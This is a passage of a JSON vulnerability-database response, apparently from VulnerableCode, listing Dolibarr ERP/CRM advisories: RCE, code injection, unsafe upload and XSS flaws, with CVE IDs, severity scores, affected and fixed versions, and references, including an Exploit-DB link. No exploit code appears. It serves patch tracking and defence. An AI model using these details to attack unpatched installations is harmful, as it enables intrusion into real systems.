n","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"V
CID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2018-16808","GHSA-r3r5-fqfm-9wrh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3spa-q7qf-suez"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/13554?format=json","vulnerability_id":"VCID-3tfr-z5d3-hfhf","summary":"Dolibarr ERP CRM vulnerable to remote code execution (RCE)\nDolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"0.0048","scoring_system":"epss","scoring_elements":"0.65354","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137"},{"reference_url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/"}],"url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvs
sv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137"},{"reference_url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8","reference_id":"GHSA-vprp-94p9-5jp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/38106?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-40137","GHSA-vprp-94p9-5jp8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3tfr-z5d3-hfhf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/51599?format=json","vulnerability_id":"VCID-3uay-6w6g-yfaw","summary":"Code injection in dolibarr/dolibarr\nImproper php function sanitization, lead to an ability to inject arbitrary PHP code and run arbitrary commands on file system. 
In the function \"dol_eval\" in the file \"dolibarr/htdocs/core/lib/functions.lib.php\", dangerous PHP functions are sanitized using \"str_replace\"; this sanitization can be bypassed using the following code in the $s parameter","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819","reference_id":"","reference_type":"","scores":[{"value":"0.01735","scoring_system":"epss","scoring_elements":"0.82781","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075"},{"reference_url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/det
ail/CVE-2022-0819"},{"reference_url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2","reference_id":"GHSA-42qm-c3cf-9wv2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/87920?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1"}],"aliases":["CVE-2022-0819","GHSA-42qm-c3cf-9wv2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3uay-6w6g-yfaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35746?format=json","vulnerability_id":"VCID-44xf-5xjn-juas","summary":"Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script\nAn issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted 
command/script.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"0.50447","scoring_system":"epss","scoring_elements":"0.97888","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.
gov/vuln/detail/CVE-2023-38886"},{"reference_url":"https://github.com/advisories/GHSA-6773-rfjv-c54w","reference_id":"GHSA-6773-rfjv-c54w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6773-rfjv-c54w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38886","GHSA-6773-rfjv-c54w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-44xf-5xjn-juas"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62198?format=json","vulnerability_id":"VCID-4925-ueg7-63dy","summary":"Dolibarr Unrestricted Upload of File with Dangerous Type\nDolibarr before 11.0.5 allows low-privilege users to upload files of dangerous types, leading to arbitrary code execution. This occurs because .pht and .phar files can be uploaded. 
Also, a .htaccess file can be uploaded to reconfigure access control (e.g., to let .noexe files be executed as PHP code to defeat the .noexe protection mechanism).","references":[{"reference_url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"0.10166","scoring_system":"epss","scoring_elements":"0.93235","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209"},{"refer
ence_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py","reference_id":"CVE-2020-14209","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/100581?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulne
rability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14209","GHSA-2gcp-xwxg-hqg3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4925-ueg7-63dy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/27543?format=json","vulnerability_id":"VCID-5vtj-mm9d-ukbf","summary":"Dolibarr vulnerable to RCE via the computed field parameter\nDolibarr ERP & CRM v21.0.1 were discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-56588","reference_id":"","reference_type":"","scores":[{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44362","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-56588"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"}
,{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86"},{"reference_url":"https://github.com/PhDg1410/Research","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/"}],"url":"https://github.com/PhDg1410/Research"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-56588","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-56588"},{"reference_url":"https://github.com/advisories/GHSA-27hj-48r9-x2vx","reference_id":"GHSA-27hj-48r9-x2vx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-27hj-48r9-x2vx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/61313?format=json","purl":"pkg:composer/dolibarr/dolibarr@21.0.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@21.0.3"}],"aliases":["CVE-2025-56588","GHSA-27hj-48r9-x2vx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5vtj-mm9d-u
kbf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14106?format=json","vulnerability_id":"VCID-5w7u-vtjw-fbck","summary":"Reflected Cross-Site Scripting (XSS) in Dolibarr\nA Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"0.00966","scoring_system":"epss","scoring_elements":"0.76861","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/","reference_id":"2024-004-cve-2024-34051","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvss
v3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-20T15:43:14Z/"}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/"},{"reference_url":"https://github.com/advisories/GHSA-hv2j-6654-x74q","reference_id":"GHSA-hv2j-6654-x74q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hv2j-6654-x74q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/38106?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-34051","GHSA-hv2j-6654-x74q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5w7u-vtjw-fbck"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38139?format=json","vulnerability_id":"VCID-6fbp-syak-2qgu","summary":"Dolibarr Improper Input Validation vulnerability\nImproper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP 
code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4197","reference_id":"","reference_type":"","scores":[{"value":"0.53316","scoring_system":"epss","scoring_elements":"0.98023","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4197"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4197","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4197"},{"reference_url":"https://starlabs.sg/advisories/23/23-4197","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/"}],"url":"https://starlabs.sg/a
